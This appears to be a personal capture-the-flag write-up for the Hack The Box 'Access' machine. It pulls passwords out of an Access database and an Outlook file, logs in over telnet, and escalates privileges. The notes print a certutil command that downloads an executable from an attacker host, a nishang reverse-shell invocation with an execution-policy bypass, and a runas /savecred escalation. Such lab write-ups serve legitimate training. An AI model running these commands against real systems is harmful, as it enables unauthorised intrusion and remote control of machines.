## Recon ### FTP - 21 - anon access - permitted - contains folders - `Access Control.zip` - password protected, needs 7zip - `.mdb` file - appears corrupt when I attempt to inspect it using "MS Access" ### Webserver - 80 ![[Pasted image 20250224175526.png]] ### TELNET - 23 - send `elo` initiates a login prompt ## Initial Access - extract some sort of password from `.mdb` file - looking through the ordeal using `strings` reveals the following string: `access4u@security` which seem to unlock the `.zip` file which in turns contains a "Outlook Data File" (`.pst`) We open up the `.pst` file: ![[Pasted image 20250224194143.png]] `security:4Cc3ssC0ntr0ller` aaaaand let's have a gander with those + telnet ``` ╭─[λ]-[~/targets/HTB/access/1_initial-access]-[10.10.10.98] ╰─> telnet $RHOST 23 Trying 10.10.10.98... Connected to 10.10.10.98. Escape character is '^]'. elo Welcome to Microsoft Telnet Service login: security password: The handle is invalid. Login Failed login:security password: *=============================================================== Microsoft Telnet Server. *=============================================================== C:\Users\security> ``` aaaand we're in. Took bout an hour. ``` certutil -urlcache -split -f http://10.10.14.11:8000/access.exe access.exe powershell -ep bypass .\nishang.ps1 -Reverse -IPAddress 10.10.14.11 -Port 23 ``` Seems we're stuck with a shit telnet shell <3 ## Privesc ``` runas /savecred /user:ACCESS\Administrator "cmd.exe /C C:\Users\security\access.exe" ```